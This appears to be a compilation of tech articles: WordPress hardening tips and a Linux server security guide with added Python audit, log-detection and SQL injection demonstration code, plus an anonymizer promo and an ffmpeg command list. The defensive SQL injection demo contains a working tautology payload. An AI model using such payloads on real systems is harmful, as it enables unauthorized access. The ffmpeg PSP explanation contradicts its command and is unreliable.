    Regardless of the type of site you are running, you may be at risk of a brute-force attack. Deleting the admin username in the first step probably deterred most hackers, but there are always those that are very persistent or already know your username. The next step to take is to choose a very difficult and diverse password. A good way to determine whether or not your password is secure is to enter it into an online password checker like passwordmeter.com or to generate a random password.

    #3 Secure Your Password

    Also, I prefer to take extra precautions when protecting my blog; installing plugins can add an extra layer of security. There are numerous plugins that can handle the password and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of all failed logins, in addition to IP blocking after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute force attack: most attackers give up on a site if they are IP banned every 5 minutes while running their brute force program.

    #4 Always Update WordPress

    As I said earlier, WordPress is open source, making it an easier target for hackers. Nearly 60 million sites use WordPress. When Automattic pumps out an update, the sooner you update your site the better, because when they make a new update they also post the vulnerabilities that they fixed. Also, it doesn't take long to update your WordPress installation; according to WordPress it takes 5 minutes to complete.

    #5 Hide WordPress Version

    Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can hack your site, especially if it's out of date. By default, WordPress displays the version, because they want it for metrics to see how many people are using which version, etc. However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling it for you, but it's always better to be sure. Open your functions.php file and drop in this line of code:

<?php remove_action('wp_head', 'wp_generator'); ?>

    #6 Change File Permissions

    It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare CHMOD value of 744, which essentially makes it read-only to everyone except you. Just open your FTP program, right click the folder or file and click on "File Permissions". If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, only giving the "owner" full access.

    #7 Whitelist

    Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one, except for you, can access the folder. We do this using the .htaccess file. Navigate to your /wp-admin/ folder, then check if there is already a .htaccess file; if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "WordPress Admin Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
# Whitelist Your IP address
allow from xx.xx.xx.xxx
# Whitelist Your Office's IP address
allow from xx.xx.xx.xxx
# Whitelist Your IP address While Your Traveling (Delete When You Come Back Home)
allow from xx.xx.xx.xxx
</LIMIT>

    Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to be logging in from somewhere other than the places you added to your .htaccess file, you have to add the new IP address before you can use it.

    #8 Backup

    Regardless of the level of security of your WordPress site, it is a good habit to always back up your site. There are many ways to do this. You can take advantage of cron jobs, if your hosting company provides them, by using this script:

DBNAME=DB_NAME
DBPASS=DB_PASSWORD
DBUSER=DB_USER
EMAIL="you@your_email.com"
mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql
gzip backup.sql
DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz
echo 'BLOG BACKUP:Your Backup is attached' | mutt -a $DBNAME-backup-$DATE.sql.gz $EMAIL -s "MySQL Backup"
rm $DBNAME-backup-$DATE.sql.gz

    Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier, especially when you need to set up your WordPress again.

    #9 Hide Your Plugins

    Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, "Who cares if someone can see my plugins?". Well, plugins can tell hackers how to hack your site, or at least whether it is hackable. Without it, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding a blank index.html to the plugins folder is like putting a security sign on your lawn: it doesn't matter whether you actually have the security system, as long as the hacker doesn't know, he will be less inclined to try anything.

    #10 Analyze Server Logs

    The best security tool, regardless of whichever plugin/software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior.

    You're Set!

    Source: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/
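    Several of the ten steps leave a checkable trace on disk. The following is an added example, not code from the tutsplus article or from WordPress: a Python audit that walks an install and reports on four of the steps (#5 generator removal in the theme's functions.php, #6 world-writable files or directories, #7 a wp-admin/.htaccess that denies by default and allows a concrete address, #9 a blank index.html in the plugins folder). The directory layout it builds in a temporary folder is constructed to mirror a stock install; the file names, the finding strings and the sample address are this example's own assumptions.

```python
# Added example (not from the tutsplus article or WordPress itself): an offline
# audit of a WordPress tree for steps #5, #6, #7 and #9 above. The sample tree
# is constructed in a temp directory; nothing here talks to a live site.
import os
import re
import stat
import tempfile

GENERATOR_OFF = re.compile(r"remove_action\(\s*['\"]wp_head['\"]\s*,\s*['\"]wp_generator['\"]")
DENY_ALL = re.compile(r"^\s*deny\s+from\s+all\s*$", re.M | re.I)
ALLOW_IP = re.compile(r"^\s*allow\s+from\s+\d+\.\d+\.\d+\.\d+\s*$", re.M | re.I)


def _read(path):
    with open(path) as fh:
        return fh.read()


def audit_wordpress(root):
    """Return a sorted list of findings; an empty list means all four checks pass."""
    findings = []

    # #6: nothing under the install should be writable by 'other'.
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                findings.append("world-writable: " + os.path.relpath(path, root))

    # #9: a blank index.html masks the plugin directory listing.
    if not os.path.isfile(os.path.join(root, "wp-content", "plugins", "index.html")):
        findings.append("plugins folder has no index.html")

    # #7: wp-admin/.htaccess must deny everyone and then allow listed addresses.
    htaccess = os.path.join(root, "wp-admin", ".htaccess")
    if not os.path.isfile(htaccess):
        findings.append("wp-admin has no .htaccess")
    else:
        text = _read(htaccess)
        if not DENY_ALL.search(text):
            findings.append("wp-admin/.htaccess does not deny by default")
        if not ALLOW_IP.search(text):
            findings.append("wp-admin/.htaccess allows no concrete IP address")

    # #5: every theme's functions.php removes the generator meta tag.
    themes = os.path.join(root, "wp-content", "themes")
    for theme in (sorted(os.listdir(themes)) if os.path.isdir(themes) else []):
        fp = os.path.join(themes, theme, "functions.php")
        if not os.path.isfile(fp) or not GENERATOR_OFF.search(_read(fp)):
            findings.append("theme %s still advertises the WordPress version" % theme)
    return sorted(findings)


def build_sample_tree(hardened):
    """Create a constructed mini WordPress layout in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    for d in ("wp-admin", "wp-content/plugins", "wp-content/themes/demo", "wp-content/uploads"):
        os.makedirs(os.path.join(root, d))

    def write(rel, body):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)

    write("wp-config.php", "<?php /* constructed sample */ ?>\n")
    if hardened:
        write("wp-content/plugins/index.html", "")
        write("wp-admin/.htaccess",
              'AuthName "WordPress Admin Access Control"\n<LIMIT GET>\norder deny,allow\n'
              "deny from all\nallow from 203.0.113.5\n</LIMIT>\n")     # 203.0.113.5 is a documentation address
        write("wp-content/themes/demo/functions.php",
              "<?php remove_action('wp_head', 'wp_generator'); ?>\n")
    else:
        write("wp-content/themes/demo/functions.php", "<?php /* generator tag left on */ ?>\n")

    # Normalise modes first so the result does not depend on the process umask.
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            os.chmod(p, 0o755 if os.path.isdir(p) else 0o644)
    if not hardened:
        os.chmod(os.path.join(root, "wp-content", "uploads"), 0o777)   # the classic mistake
        os.chmod(os.path.join(root, "wp-config.php"), 0o666)
    return root


if __name__ == "__main__":
    for finding in audit_wordpress(build_sample_tree(hardened=False)):
        print(finding)
    print("hardened tree:", audit_wordpress(build_sample_tree(hardened=True)))
```

    One caveat the audit does not cover: the article's `<LIMIT GET>` wrapper applies its deny/allow rules to GET only, so Apache still serves POST requests to wp-admin from any address; placing the deny/allow lines outside any `<Limit>` block, or using `<LimitExcept>`, closes that gap.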
17. Linux Security Basics

Published: Monday, August 31st, 2009 by Sam Kleinman

One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices.

This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks.

It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis.

Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier). There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems.

Contents

Keep Systems and Software Up To Date
Disable Unused Services
Lock Down SSH
Limit Root and System Users' Access
Use a Firewall to Block Unwanted Traffic
Use Denyhosts or Fail2Ban to Prevent Password Attacks
Encrypt Sensitive Data
Best Practices with Databases

Keep Systems and Software Up To Date

One of the most significant sources of security vulnerabilities is systems running out-of-date software with known security holes.
Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu systems) or "yum update" (for CentOS and Fedora systems), is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages.

System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python's easy_install, and Haskell's Cabal. You will have to manage the process of keeping these files up to date yourself.

The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming-platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory).
Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman. Because of the complexity of maintaining software outside of the system's package management tools, we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice of a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server.

Disable Unused Services

One common avenue for attack involves exploiting unused applications. In general we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so.

Not only will unused services no longer consume system resources; if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install it with "apt-get install htop", "yum install htop" or "pacman -Sy htop".

Lock Down SSH

SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker.
To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps.

First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows:

    PermitRootLogin no

If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root.

Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file "/etc/ssh/sshd_config", modify PasswordAuthentication as follows:

    PasswordAuthentication no

If you do not have SSH keys generated you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally:

    ssh-keygen

Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names):

    scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub
    ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys"

If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY homepage.
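To check that the two sshd_config edits above actually take effect, here is an added example (not part of the original guide, and not Linode's or OpenSSH's code) that reads a configuration file the way sshd does: the first value it finds for a keyword wins, so a hardening line appended below an existing "PermitRootLogin yes" is silently ignored. The sample configuration is constructed to show exactly that case; directives inside a "Match" block are not evaluated because they apply only conditionally.

```python
"""Audit an sshd_config for the two settings the guide asks you to change.

Added example, not from the original guide.  sshd(8) uses the *first*
value it reads for each keyword, so a hardening line appended to the end of
the file is ignored when an earlier line already sets the keyword.  This
checker reproduces that rule so the report reflects what sshd will do.
"""

# Settings the guide recommends and the value each must have.
REQUIRED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
}


def parse_sshd_config(text):
    """Return {keyword: first_value} for the global section of sshd_config.

    Keywords are case-insensitive; whitespace or '=' may separate keyword and
    value; comments and blank lines are skipped.  Parsing stops at the first
    'Match' block because directives there apply only conditionally.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)
        if "=" in head[0]:                      # "Keyword=value" form
            key, _, value = line.partition("=")
        else:                                   # "Keyword value" or "Keyword = value"
            key = head[0]
            value = head[1] if len(head) > 1 else ""
        key = key.strip().lower()
        value = value.lstrip("= ").strip()
        if key == "match":
            break
        settings.setdefault(key, value)         # first value wins, as in sshd
    return settings


def audit(text):
    """Return a list of findings; an empty list means both settings are hardened."""
    settings = parse_sshd_config(text)
    findings = []
    for key, wanted in REQUIRED.items():
        actual = settings.get(key)
        if actual is None:
            findings.append(f"{key}: not set (sshd default applies)")
        elif actual.lower() != wanted:
            findings.append(f"{key}: effective value is '{actual}', want '{wanted}'")
    return findings


# Constructed sample: the hardening lines were appended at the bottom, but an
# earlier PermitRootLogin line already exists and takes precedence.
SAMPLE_CONFIG = """\
# Distribution default
PermitRootLogin yes
Port 22

# Hardening added later (only the PasswordAuthentication line takes effect)
PermitRootLogin no
PasswordAuthentication no
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

Point audit() at the contents of /etc/ssh/sshd_config after editing; if it reports a keyword whose effective value is still "yes", the fix is to change the earlier line rather than to add another one.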
If you have a problem logging in you will need physical access or out-of-band console access to your server to restore SSH functionality. You can use the Linode shell (LISH) to access your server's console.

Limit Root and System Users' Access

In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regards to managing your user accounts:

- Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases.

- If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user.

- Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system.

- Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock").
Limiting access to your servers and adhering to best practices with regards to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks.

Use a Firewall to Block Unwanted Traffic

As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious.

On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions.

Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself, which means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need.

It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup must take the actual uses of your server and its users into account, we offer the following list of potential strategies for deploying a firewall.

1. Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on.
The most common standard ports include: web servers on port 80, SSH on port 22, SMTP on port 25. If there are any security vulnerabilities in software running on other ports, or intruders are scanning for open ports, the firewall will reject this traffic before it can invade your system.

Disadvantages: This filter can be confusing if your suite of services changes regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot.

2. Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while.

Disadvantages: People can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen.

3. Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would-be attackers from gaining access to your machines without hindering the good traffic.

Disadvantages: This strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible.

These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks.
When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that I actually want to serve?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment.

Use Denyhosts or Fail2Ban to Prevent Password Attacks

The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, these applications will insert firewall rules that will block traffic from the attacker's IP address.

The assumption is that "good" users are very likely to be able to get their password correct in less than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into a system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary.

The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH.

While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole.
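The threshold rule that DenyHosts and Fail2Ban apply, and the "watch access logs and block attacking IPs" firewall strategy described above, come down to a few lines of detection logic. The block below is an added example, not code from the guide or from either tool: it scans constructed sshd log lines for failed-password events, keeps a sliding window of failures per source address, and returns the addresses that exceed the limit. The parameter names maxretry and findtime borrow Fail2Ban's option names; the values are assumptions, and inserting the firewall rule itself is deliberately left out so the function only reports what to ban.

```python
"""Threshold-based detection of password guessing from sshd log lines.

Added example, not code from the original guide or from DenyHosts/Fail2Ban.
It implements the rule the guide describes: more than maxretry failed
logins from one address inside findtime seconds marks the address for a
(temporary) ban.  Ban enforcement is left out on purpose.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The sshd line DenyHosts/Fail2Ban look for.  Traditional syslog stamps
# carry no year, so only relative times matter here.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(lines):
    """Yield (timestamp, ip) for each failed-password line; other lines are ignored."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            yield datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"), m.group("ip")


def offenders(lines, maxretry=5, findtime=600):
    """Return the set of addresses with more than maxretry failures inside any
    findtime-second window.  A per-address sliding window drops old entries,
    so a user who mistypes twice an hour is never flagged (the false-positive
    case the guide mentions)."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)
    banned = set()
    for ts, ip in parse_failures(lines):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > maxretry:
            banned.add(ip)
    return banned


# Constructed sample log (RFC 5737 documentation addresses): 203.0.113.9
# hammers the server within seconds, 198.51.100.4 fails twice and then logs
# in with a key, and one line is unrelated noise.
SAMPLE_LOG = """\
Oct 20 13:13:01 web1 sshd[4101]: Failed password for root from 203.0.113.9 port 50112 ssh2
Oct 20 13:13:03 web1 sshd[4103]: Failed password for root from 203.0.113.9 port 50114 ssh2
Oct 20 13:13:05 web1 sshd[4105]: Failed password for invalid user admin from 203.0.113.9 port 50118 ssh2
Oct 20 13:13:07 web1 sshd[4107]: Failed password for invalid user test from 203.0.113.9 port 50120 ssh2
Oct 20 13:13:09 web1 sshd[4109]: Failed password for root from 203.0.113.9 port 50122 ssh2
Oct 20 13:13:11 web1 sshd[4111]: Failed password for root from 203.0.113.9 port 50124 ssh2
Oct 20 13:14:00 web1 sshd[4120]: Failed password for sam from 198.51.100.4 port 41000 ssh2
Oct 20 13:14:30 web1 sshd[4122]: Accepted publickey for sam from 198.51.100.4 port 41002 ssh2
Oct 20 13:15:00 web1 sshd[4124]: Failed password for sam from 198.51.100.4 port 41004 ssh2
""".splitlines()

if __name__ == "__main__":
    print("ban:", sorted(offenders(SAMPLE_LOG)))
```

Lowering maxretry or widening findtime makes the filter stricter; the trade-off is exactly the false-positive risk the guide mentions, which is why the real tools pair this logic with a ban that expires.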
Encrypt Sensitive Data

If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal.

First, encrypt individual files using PGP and the tools provided by the GNU Privacy Guard package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key.

The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable.

Additionally, disk-level encryption protects against a very narrow set of threats: physical attacks against the hardware and unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience.
The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this avoids the additional complexity of managing individual encrypted files, while still allowing for high quality data security.

Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment.

Best Practices with Databases

One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications.

- Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or using code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires that all input from external sources be tested with a regular expression before it may be used in your program.
This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data. If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" is a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages.

- Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modifications to your database or to access unauthorized content from your system.

- Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit.

These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure.

Sursa: Linux Security Basics
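The prepared-statement advice is clearest when shown beside the pattern it replaces. The following is an added example, not from the guide (which talks in terms of Perl and PHP; this uses Python's sqlite3 module, whose "?" placeholders work the same way as prepared statements in other database interfaces): it runs the same login lookup against a constructed in-memory database once with the inputs pasted into the SQL text and once with bound parameters. The tautology input that makes the first query return every row matches nothing in the second, because the driver hands it to the engine as a literal value rather than as SQL.

```python
"""Parameterised queries versus string-built SQL, with sqlite3.

Added example, not from the original guide.  A throw-away in-memory user
table is queried two ways: the vulnerable form that interpolates user input
into the SQL text, and the prepared-statement form the guide recommends,
where the driver binds the values so the input can never change the
query's structure.
"""
import sqlite3


def make_db():
    """Constructed sample data: an in-memory database with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_unsafe(conn, name, password):
    """Vulnerable: the inputs become part of the SQL text, so quotes and
    operators in them are parsed as SQL."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}' ORDER BY name")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    """Prepared statement: '?' placeholders are bound by the driver, so the
    same input is compared literally as a password and matches nothing."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, (name, password))]


# The textbook tautology that the guide's "sanitize inputs" advice exists to
# stop: in the unsafe query it turns the WHERE clause into (...) OR '1'='1'.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("unsafe:", login_unsafe(conn, "alice", TAUTOLOGY))  # every user
    print("safe:  ", login_safe(conn, "alice", TAUTOLOGY))    # nobody
    print("valid: ", login_safe(conn, "bob", "hunter2"))      # ['bob']
```

Escaping functions such as mysql_real_escape_string reduce the same risk for string-built SQL, but binding parameters removes the whole class of error, which is why the guide lists prepared statements as the typical approach.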
18. TUS - The Untraceable Surfer

We provide a platform for truly anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also, internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone.

Download: https://www.tusurfer.com/tus/download.do

Dear User,

On behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to be able to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although later I moved to Canada (one of the best countries in the world) I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also, if you have any suggestion, concern or question we would love to hear from you.

Kindest regards,
Nigel Fox

Info: https://www.tusurfer.com/tus/index.jsp
19. 19 ffmpeg commands for all needs

ffmpeg is a multiplatform, open-source library for video and audio files. I have compiled 19 useful and amazing commands covering almost all needs: video conversion, sound extraction, encoding files for iPod or PSP, and more.

Getting info from a video file

    ffmpeg -i video.avi

Turn X images into a video sequence

    ffmpeg -f image2 -i image%d.jpg video.mpg

This command will transform all the images from the current directory (named image1.jpg, image2.jpg, etc.) into a video file named video.mpg.

Turn a video into X images

    ffmpeg -i video.mpg image%d.jpg

This command will generate the files named image1.jpg, image2.jpg, ... The following image formats are also available: PGM, PPM, PAM, PGMYUV, JPEG, GIF, PNG, TIFF, SGI.

Encode a video sequence for the iPod/iPhone

    ffmpeg -i source_video.avi -acodec aac -ab 128kb -vcodec mpeg4 -b 1200kb -mbd 2 -flags +4mv+trell -aic 2 -cmp 2 -subcmp 2 -s 320x180 -title X final_video.mp4

Explanations:
Source: source_video.avi
Audio codec: aac
Audio bitrate: 128kb/s
Video codec: mpeg4
Video bitrate: 1200kb/s
Video size: 320px by 180px
Generated video: final_video.mp4

Encode video for the PSP

    ffmpeg -i source_video.avi -b 300 -s 320x240 -vcodec xvid -ab 32 -ar 24000 -acodec aac final_video.mp4

Explanations:
Source: source_video.avi
Audio codec: aac
Audio bitrate: 32kb/s
Video codec: xvid
Video bitrate: 1200kb/s
Video size: 320px by 180px
Generated video: final_video.mp4

Extracting sound from a video and saving it as MP3

    ffmpeg -i source_video.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 sound.mp3

Explanations:
